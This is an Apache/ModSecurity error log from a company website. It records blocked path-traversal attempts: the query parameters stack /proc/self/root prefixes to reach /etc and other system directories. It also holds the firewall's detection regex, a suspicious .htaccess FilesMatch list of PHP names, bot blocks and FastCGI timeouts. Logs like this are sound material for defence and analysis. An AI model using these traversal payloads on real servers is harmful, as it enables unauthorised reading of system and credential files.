[Tue Mar 17 18:50:35.191019 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:42940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMq-yqAr6etmhZHNpDswAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:50:36.822264 2026] [:error] [pid 29151:tid 140411565680384] [client 74.7.241.31:45548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMrPPqhzTj3BvfDX-jJAAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:50:51.518840 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.31:39630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnMuweiSKl8TjouI-YzuQAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:50:56.073872 2026] [proxy_fcgi:error] [pid 2598:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36746] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:51:18.642957 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37328] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:51:41.129820 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37930] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:52:03.121803 2026] [proxy_fcgi:error] [pid 19507:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38562] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:52:26.129809 2026] [proxy_fcgi:error] [pid 7004:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39158] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:52:48.129905 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39716] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:53:10.145799 2026] [proxy_fcgi:error] [pid 2598:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:40330] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:53:32.053961 2026] [proxy_fcgi:error] [pid 6296:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40814] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:53:36.675774 2026] [mime_magic:error] [pid 6296:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:36714] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet
[Tue Mar 17 18:53:36.675930 2026] [access_compat:error] [pid 6296:tid 140411582465792] [client 74.7.241.31:36714] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet
[Tue Mar 17 18:53:47.515917 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.243.128:60110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnNa_PqhzTj3BvfDX-jrwAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:53:54.141793 2026] [proxy_fcgi:error] [pid 2598:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41508] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:54:16.136009 2026] [proxy_fcgi:error] [pid 2473:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42130] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:54:43.133774 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:54:53.132673 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.128:50166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnNrQeiSKl8TjouI-Y0OgAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:55:06.153780 2026] [proxy_fcgi:error] [pid 2598:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43460] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:55:27.133794 2026] [proxy_fcgi:error] [pid 2598:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44184] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:55:50.561775 2026] [proxy_fcgi:error] [pid 2598:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44888] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:55:51.803534 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.228.61:41882] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnN5-yqAr6etmhZHNpETQAAAFg"]
[Tue Mar 17 18:56:12.155889 2026] [proxy_fcgi:error] [pid 2473:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45500] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:56:18.339688 2026] [:error] [pid 11088:tid 140411590858496] [client 74.7.244.43:37718] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnOAmmqtCojLHvu5cKEpwAAAJI"]
[Tue Mar 17 18:56:35.141798 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46308] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:56:57.119053 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46996] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:57:19.125877 2026] [proxy_fcgi:error] [pid 19507:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47610] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:57:24.906567 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.128:54306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnORKBJNF7axNlVR0U1KgAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:57:41.119661 2026] [proxy_fcgi:error] [pid 7437:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48340] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:57:48.789914 2026] [mime_magic:error] [pid 11088:tid 140411632822016] (70014)End of file found: [client 74.7.243.128:44520] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/libexec/selinux
[Tue Mar 17 18:57:48.790226 2026] [access_compat:error] [pid 11088:tid 140411632822016] [client 74.7.243.128:44520] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/libexec/selinux
[Tue Mar 17 18:58:04.133795 2026] [proxy_fcgi:error] [pid 6296:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48990] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:58:14.479795 2026] [core:alert] [pid 26799:tid 140411699963648] [client 74.7.241.31:42674] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/rpm/platform
[Tue Mar 17 18:58:18.059148 2026] [:error] [pid 25836:tid 140411632822016] [client 74.7.243.128:43496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnOeYh-PF_25v4hFRCG8wAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:58:20.438341 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:57718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnOe-yqAr6etmhZHNpEfgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:58:22.127497 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:57730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnOfuyqAr6etmhZHNpEfwAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:58:26.129777 2026] [proxy_fcgi:error] [pid 19507:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49672] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:58:45.179389 2026] [:error] [pid 13577:tid 140411582465792] [client 74.7.243.128:50756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnOkxHAU4oLqO8Bq2ow8AAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:58:48.125843 2026] [proxy_fcgi:error] [pid 6296:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50350] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:59:10.141821 2026] [proxy_fcgi:error] [pid 25836:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50914] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:59:32.121846 2026] [proxy_fcgi:error] [pid 29151:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51604] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:59:50.087471 2026] [:error] [pid 11088:tid 140411699963648] [client 74.7.243.128:48968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnO1mmqtCojLHvu5cKFLgAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:59:54.149516 2026] [proxy_fcgi:error] [pid 12042:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52328] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:00:17.137841 2026] [proxy_fcgi:error] [pid 2473:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53076] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:00:39.161959 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53792] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:00:53.102219 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.228.61:46992] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnPFaBJNF7axNlVR0U1igAAAAA"]
[Tue Mar 17 19:01:02.825897 2026] [proxy_fcgi:error] [pid 7004:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54528] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:01:07.338535 2026] [core:alert] [pid 11088:tid 140411624429312] [client 74.7.243.128:48968] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/include/mtd/ubi-user.h&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/include/mtd
[Tue Mar 17 19:01:14.896039 2026] [mime_magic:error] [pid 11561:tid 140411565680384] (70014)End of file found: [client 74.7.241.31:48500] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/firmware
[Tue Mar 17 19:01:19.717523 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.244.43:37120] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnPL6BJNF7axNlVR0U1lwAAABI"]
[Tue Mar 17 19:01:25.120539 2026] [proxy_fcgi:error] [pid 11088:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:01:41.991375 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.243.128:33554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnPRaBJNF7axNlVR0U1qAAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 19:01:52.221848 2026] [proxy_fcgi:error] [pid 25836:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56060] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:02:13.133794 2026] [proxy_fcgi:error] [pid 12042:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56752] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:02:36.131027 2026] [proxy_fcgi:error] [pid 7004:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57482] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:02:58.158208 2026] [proxy_fcgi:error] [pid 11088:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58260] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:03:20.557802 2026] [proxy_fcgi:error] [pid 29151:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59018] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 19:03:42.163741 2026] [proxy_fcgi:error] [pid 11088:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59774] AH01075: Error dispatching request to : (polling)
